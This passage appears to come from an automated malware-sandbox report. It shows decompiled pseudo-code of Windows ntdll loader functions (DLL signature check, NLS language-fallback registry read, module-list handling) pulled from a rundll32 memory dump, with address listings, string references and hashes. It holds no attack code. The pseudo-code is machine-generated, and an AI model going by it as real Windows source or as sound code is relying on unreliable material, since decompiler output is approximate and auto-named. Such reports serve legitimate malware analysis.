					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04427D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04427D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04487016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04427D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04427D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04487016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0443A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0440B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                0x04417e4c
                                                                                                                0x04417e50
                                                                                                                0x04417e55
                                                                                                                0x04417e58
                                                                                                                0x04417e5d
                                                                                                                0x04417e71
                                                                                                                0x04417f33
                                                                                                                0x04417e77
                                                                                                                0x04417e77
                                                                                                                0x04417e79
                                                                                                                0x04417e79
                                                                                                                0x04417e7e
                                                                                                                0x04417f45
                                                                                                                0x04469848
                                                                                                                0x00000000
                                                                                                                0x04469848
                                                                                                                0x04417f4e
                                                                                                                0x04417f53
                                                                                                                0x04417f5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446985a
                                                                                                                0x04469862
                                                                                                                0x04469866
                                                                                                                0x00000000
                                                                                                                0x0446986c
                                                                                                                0x00000000
                                                                                                                0x0446986c
                                                                                                                0x04417e84
                                                                                                                0x04417e84
                                                                                                                0x04417e8d
                                                                                                                0x04469871
                                                                                                                0x04417eb8
                                                                                                                0x04417ec0
                                                                                                                0x04417ec0
                                                                                                                0x04417e9a
                                                                                                                0x0446987e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04469884
                                                                                                                0x0446988b
                                                                                                                0x044698a7
                                                                                                                0x044698ac
                                                                                                                0x044698b1
                                                                                                                0x044698b6
                                                                                                                0x044698b8
                                                                                                                0x044698b8
                                                                                                                0x044698b9
                                                                                                                0x00000000
                                                                                                                0x044698b9
                                                                                                                0x04417ea0
                                                                                                                0x04417ea7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04417eac
                                                                                                                0x04417eb1
                                                                                                                0x04417ec6
                                                                                                                0x04417ed0
                                                                                                                0x044698cc
                                                                                                                0x04417ed6
                                                                                                                0x04417ed6
                                                                                                                0x04417ed6
                                                                                                                0x04417ede
                                                                                                                0x04417ee3
                                                                                                                0x044698e3
                                                                                                                0x044698f0
                                                                                                                0x04469902
                                                                                                                0x044698f2
                                                                                                                0x044698fb
                                                                                                                0x044698fb
                                                                                                                0x04469907
                                                                                                                0x0446991d
                                                                                                                0x0446991d
                                                                                                                0x04469907
                                                                                                                0x044698e3
                                                                                                                0x04417ef0
                                                                                                                0x04417f14
                                                                                                                0x04417f14
                                                                                                                0x04417f1e
                                                                                                                0x04469946
                                                                                                                0x04417f24
                                                                                                                0x04417f24
                                                                                                                0x04417f24
                                                                                                                0x04417f2c
                                                                                                                0x0446996a
                                                                                                                0x04469975
                                                                                                                0x04469975
                                                                                                                0x0446997e
                                                                                                                0x04469993
                                                                                                                0x04469993
                                                                                                                0x0446997e
                                                                                                                0x00000000
                                                                                                                0x04417ef2
                                                                                                                0x04417efc
                                                                                                                0x04417f0a
                                                                                                                0x04417f0e
                                                                                                                0x04469933
                                                                                                                0x00000000
                                                                                                                0x04469933
                                                                                                                0x00000000
                                                                                                                0x04417f0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04417eb1

                                                                                                                Strings
                                                                                                                • LdrpCompleteMapModule, xrefs: 04469898
                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 044698A2
                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 04469891
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                • API String ID: 0-1676968949
                                                                                                                • Opcode ID: 2795b777a58b69ab8c83b51259c447348eba281540e6b6efe26677159c8808ec
                                                                                                                • Instruction ID: 06c103ea29f3815308f388186d046225aa269afdf6aadb1f936d0bad70891e25
                                                                                                                • Opcode Fuzzy Hash: 2795b777a58b69ab8c83b51259c447348eba281540e6b6efe26677159c8808ec
                                                                                                                • Instruction Fuzzy Hash: B651CD71A007449FEF21CF69C984B2ABBE4AB01314F14056BE8529B7E2D774FD01CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0440E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0440F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E044495D0();
						}
						if(_t78 != 0) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0444FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0444BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04449600();
					if(_t97 < 0) {
						goto L6;
					}
					E0444BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0440F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0444BB40(_t83, _t102 + 0x24, _t78);
								if(L044143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0444BB40(_t84, _t102 + 0x24, _t94);
									if(L044143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                0x0440e620
                                                                                                                0x0440e628
                                                                                                                0x0440e62f
                                                                                                                0x0440e631
                                                                                                                0x0440e635
                                                                                                                0x0440e637
                                                                                                                0x0440e63e
                                                                                                                0x04465503
                                                                                                                0x04465503
                                                                                                                0x0440e64c
                                                                                                                0x0440e64c
                                                                                                                0x0440e651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0440e661
                                                                                                                0x0440e665
                                                                                                                0x0446542a
                                                                                                                0x0440e715
                                                                                                                0x0440e71a
                                                                                                                0x0440e71c
                                                                                                                0x0440e720
                                                                                                                0x0440e720
                                                                                                                0x0440e727
                                                                                                                0x0440e736
                                                                                                                0x0440e736
                                                                                                                0x0440e743
                                                                                                                0x0440e743
                                                                                                                0x0440e673
                                                                                                                0x0440e678
                                                                                                                0x0440e67d
                                                                                                                0x0440e682
                                                                                                                0x0440e685
                                                                                                                0x0440e692
                                                                                                                0x0440e69b
                                                                                                                0x0440e6a3
                                                                                                                0x0440e6ad
                                                                                                                0x0440e6b1
                                                                                                                0x0440e6b2
                                                                                                                0x0440e6bb
                                                                                                                0x0440e6bf
                                                                                                                0x0440e6c0
                                                                                                                0x0440e6c8
                                                                                                                0x0440e6cc
                                                                                                                0x0440e6d5
                                                                                                                0x0440e6d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0440e6e5
                                                                                                                0x0440e6ea
                                                                                                                0x0440e6f9
                                                                                                                0x0440e70b
                                                                                                                0x0440e70f
                                                                                                                0x04465439
                                                                                                                0x0446545e
                                                                                                                0x0446545e
                                                                                                                0x00000000
                                                                                                                0x0446545e
                                                                                                                0x0446543b
                                                                                                                0x0446543e
                                                                                                                0x04465440
                                                                                                                0x04465445
                                                                                                                0x04465472
                                                                                                                0x04465475
                                                                                                                0x0446548d
                                                                                                                0x04465493
                                                                                                                0x044654a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044654ab
                                                                                                                0x044654b4
                                                                                                                0x044654bc
                                                                                                                0x044654c8
                                                                                                                0x044654de
                                                                                                                0x044654fb
                                                                                                                0x044654e0
                                                                                                                0x044654e6
                                                                                                                0x044654eb
                                                                                                                0x044654eb
                                                                                                                0x044654de
                                                                                                                0x00000000
                                                                                                                0x044654bc
                                                                                                                0x04465477
                                                                                                                0x0446547a
                                                                                                                0x04465480
                                                                                                                0x04465483
                                                                                                                0x04465486
                                                                                                                0x0446548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04465447
                                                                                                                0x04465447
                                                                                                                0x04465447
                                                                                                                0x04465447
                                                                                                                0x0446544e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04465450
                                                                                                                0x04465452
                                                                                                                0x04465455
                                                                                                                0x0446545a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446545c
                                                                                                                0x0446546a
                                                                                                                0x0446546d
                                                                                                                0x0446546f
                                                                                                                0x00000000
                                                                                                                0x0446546f
                                                                                                                0x0440e70f

                                                                                                                Strings
                                                                                                                • InstallLanguageFallback, xrefs: 0440E6DB
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0440E68C
                                                                                                                • @, xrefs: 0440E6C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                • API String ID: 0-1757540487
                                                                                                                • Opcode ID: d708e6d00f1afc1ccc027a7ddac4eaa2958a9aea5d119755283ec87d10329871
                                                                                                                • Instruction ID: 748f608c309116b4d2d5e190666e5033e0680c6e2e3932b885448ce3aef96f62
                                                                                                                • Opcode Fuzzy Hash: d708e6d00f1afc1ccc027a7ddac4eaa2958a9aea5d119755283ec87d10329871
                                                                                                                • Instruction Fuzzy Hash: 6A51A0B2508355ABDB20DF25D440B6BB3E8AF88714F04496FF986D7241FB34FA1487A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0441D5E0 Relevance: 2.9, Strings: 2, Instructions: 353COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0441D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x44fd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04416600(0x44f52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x44f7b9c; // 0x0
							_t281 = L04424620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0444F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x44f7b90; // 0x77d00000
								if(_t384 == 0) {
									_t353 =  *0x44f7b8c; // 0x3529e8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x352a98
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04422280(_t200, 0x44f84d8);
									_t277 =  *0x44f85f4; // 0x355c58
									_t351 =  *0x44f85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x76180000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x355ca0
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x355bf0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x355ca0
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x355e98
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0441FFB0(_t287, _t353, 0x44f84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0445CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04416600(0x44f52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04417926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x44fb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0448E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x44f8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x44fb218; // 0xe690506
														asm("ror edi, cl");
														 *0x44fb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04422280(_t250, 0x44f84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04443898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0441FFB0(_t293, _t353, 0x44f84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E044437F5(_t353, 0);
																}
																E04440413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04439B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E044302D6(_t174);
																}
																L044277F0( *0x44f7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0443C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0441EC7F(_t353);
										L044319B8(_t287, 0, _t353, 0);
										_t200 = E0440F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0444B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x44fb2f8; // 0x750000
									if((_t206 |  *0x44fb2fc) == 0 || ( *0x44fb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x44fb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E044B6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E044B6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0441E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0441EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04449730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0441E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04418F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
